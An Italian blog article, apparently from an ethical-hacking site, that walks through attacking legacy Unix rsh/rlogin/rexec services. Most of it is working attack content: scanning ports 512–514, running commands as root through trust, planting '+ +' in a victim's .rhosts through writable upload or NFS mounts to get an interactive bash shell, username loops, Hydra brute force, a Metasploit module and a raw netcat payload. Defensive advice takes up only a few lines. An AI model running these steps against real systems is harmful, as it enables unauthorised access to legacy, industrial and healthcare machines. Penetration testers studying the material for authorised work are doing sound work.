networking

RSH: Remote Shell in Chiaro su Sistemi Unix

RSH: Remote Shell in Chiaro su Sistemi Unix

RSH: Remote Shell in Chiaro su Sistemi Unix

  • Pubblicato il 2026-02-23
  • Tempo di lettura: 3 min

Rsh (Remote Shell) è un protocollo legacy per esecuzione comandi remota su sistemi Unix che precede SSH. Sebbene obsoleto e insicuro, Rsh è ancora presente in ambienti legacy, sistemi embedded industriali e infrastrutture mai aggiornate. In questa guida impari a identificare e sfruttare r-services per ottenere accesso a sistemi che il tempo ha dimenticato.

Perché Rsh è Rilevante nel 2026 #

Potresti pensare che nessuno usi più Rsh. La realtà è diversa: ambienti industriali (SCADA/ICS), sistemi mainframe, appliance di rete datate e infrastrutture legacy spesso mantengono r-services attivi per compatibilità. Durante penetration test in settori come manufacturing, energy o healthcare, incontrare Rsh non è raro.

L’assenza di crittografia e l’autenticazione basata su trust (IP/hostname) rendono Rsh un vettore di attacco prezioso quando presente.

La Famiglia R-Services #

Rsh fa parte di una suite di servizi remoti Berkeley:

ServizioPortaFunzione
rsh514/tcpEsecuzione comandi remota
rlogin513/tcpLogin remoto interattivo
rexec512/tcpEsecuzione remota con password
rcp514/tcpCopia file remota

Tutti condividono lo stesso modello di autenticazione debole basato su file .rhosts e hosts.equiv.

Installazione Client #

Su Kali Linux il client rsh potrebbe non essere preinstallato:

bash
sudo apt update && sudo apt install rsh-client -y

Verifica:

bash
rsh --help

Su sistemi dove il pacchetto non è disponibile, puoi usare netcat per interagire direttamente con il protocollo.

Come Funziona l’Autenticazione Rsh #

Rsh usa un modello di trust basato su:

  1. hosts.equiv - File globale /etc/hosts.equiv che lista host fidati
  2. .rhosts - File per-utente ~/.rhosts che specifica quali utenti remoti possono accedere

La riga + + in questi file è il jackpot: permette a QUALSIASI host e QUALSIASI utente di connettersi.

Identificazione di R-Services #

Prima di attaccare, identifica i servizi con Nmap:

bash
nmap -sV -p 512,513,514 192.168.1.0/24

Output per sistema vulnerabile:

text
PORT    STATE SERVICE VERSION
512/tcp open  exec    rexecd
513/tcp open  login   rlogind
514/tcp open  shell   rshd

Uso Base di Rsh #

Esecuzione Comando Singolo #

bash
rsh -l username targethost command

Esempio pratico:

bash
rsh -l root 192.168.1.100 id

Output se il trust è configurato:

text
uid=0(root) gid=0(root) groups=0(root)

Shell Interattiva con Rlogin #

bash
rlogin -l root 192.168.1.100

Tecniche di Exploitation #

Scenario 1: Trust Universale (+ +) #

Il caso più favorevole: .rhosts contiene + +.

bash
# COMANDO: Test accesso root
rsh -l root 192.168.1.100 id

OUTPUT ATTESO #

text
uid=0(root) gid=0(root) groups=0(root)

COSA FARE SE FALLISCE #

  • “Permission denied”: Il trust non include il tuo IP/utente
  • “Connection refused”: Rsh non attivo o firewall

Scenario 2: Rhosts Injection #

Se hai write access limitato (via FTP anonimo, web upload):

bash
echo "+ +" > /home/victim/.rhosts
rsh -l victim targethost /bin/bash -i

Scenario 3: NFS + Rsh Combo #

Se il target esporta home directory via NFS:

bash
sudo mount -t nfs 192.168.1.100:/home /mnt/nfs
echo "+ +" > /mnt/nfs/victim/.rhosts
rsh -l victim 192.168.1.100 id

Scenari Pratici di Penetration Test #

Scenario Completo: Legacy Unix Environment #

Timeline stimata: 20 minuti

bash
# COMANDO: Scan iniziale
nmap -sV -p 512-514 192.168.1.50

OUTPUT ATTESO #

text
PORT    STATE SERVICE
512/tcp open  exec
513/tcp open  login  
514/tcp open  shell
bash
# COMANDO: Test trust con utenti comuni
for user in root admin oracle nobody bin; do
    echo "Testing $user..."
    rsh -l $user 192.168.1.50 id 2>/dev/null && echo "SUCCESS: $user"
done

Integration Matrix #

Rsh +RisultatoUso
NmapIdentificazione r-servicesnmap -p 512-514 target
NFSInjection .rhosts via mountComprometti trust
HydraBruteforce rexechydra rexec://target
MetasploitModuli rsh_loginScanner automatizzato

Metasploit per R-Services #

bash
msf6 > use auxiliary/scanner/rservices/rsh_login
msf6 auxiliary(rsh_login) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(rsh_login) > set USERNAME root
msf6 auxiliary(rsh_login) > run

Detection e Countermeasures #

Cosa Cerca il Blue Team #

  • Connessioni su porte 512-514
  • Modifiche a .rhosts e hosts.equiv
  • Log in /var/log/auth.log

Troubleshooting #

“Connection refused” #

bash
nmap -p 514 target

“Permission denied” #

Prova altri username o cerca vettori per modificare .rhosts.

Client non disponibile #

Usa netcat:

bash
echo -e "\0root\0root\0id\0" | nc target 514

Cheat Sheet Comandi #

OperazioneComando
Comando remotorsh -l user host command
Shell interattivarlogin -l user host
Copia file uploadrcp file user@host:/path
Test trustrsh -l root host id

FAQ #

Rsh è ancora usato?

Sì, in ambienti legacy, SCADA/ICS e mainframe.

Come difendersi da Rsh?

Disabilitare i servizi, usare SSH, firewall su porte 512-514.

È legale testare Rsh?

Solo su sistemi autorizzati. Per penetration test legacy, hackita.it/servizi.

Vuoi supportare HackIta? Visita hackita.it/supporto per donazioni. Per penetration test professionali e formazione 1:1, scopri hackita.it/servizi.

Risorse: R-Services Wikipedia

#unix

Relate Articles

DIVENTA PARTE DELL’ÉLITE DELL’HACKING ETICO.

Accedi a risorse avanzate, lab esclusivi e strategie usate dai veri professionisti della cybersecurity.

Non sono un robot

Iscrivendoti accetti di ricevere la newsletter di HACKITA. Ti puoi disiscrivere in qualsiasi momento.